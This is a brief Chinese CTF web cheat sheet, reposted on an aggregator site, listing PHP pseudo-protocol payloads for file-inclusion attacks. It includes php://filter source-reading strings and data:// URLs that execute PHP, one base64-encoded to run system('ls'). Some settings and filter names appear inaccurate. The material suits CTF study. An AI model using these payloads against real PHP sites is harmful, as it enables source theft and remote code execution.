CTF-Web-常用伪协议用法:
生活随笔
收集整理的這篇文章主要介紹了
CTF-Web-常用伪协议用法:
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
常用偽協議用法:
1.php偽協議
用法
php://input,用于執行php代碼,需要post請求提交數據。
php://filter,用于讀取源碼,get提交參數。?a=php://filter/read=convert.base64/resource=xxx.php
需要開啟allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要開啟allow_url_fopen:php://filter
2.、data協議
用法:
data://text/plain,xxxx(要執行的php代碼)
data://text/plain;base64,xxxx(base64編碼后的數據)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
3.、file協議
用法:
file://[本地文件系統的絕對路徑]
總結
以上是生活随笔為你收集整理的CTF-Web-常用伪协议用法:的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Python正则表达式介绍 re.fi
- 下一篇: 解决php文件包含的问题;Web_php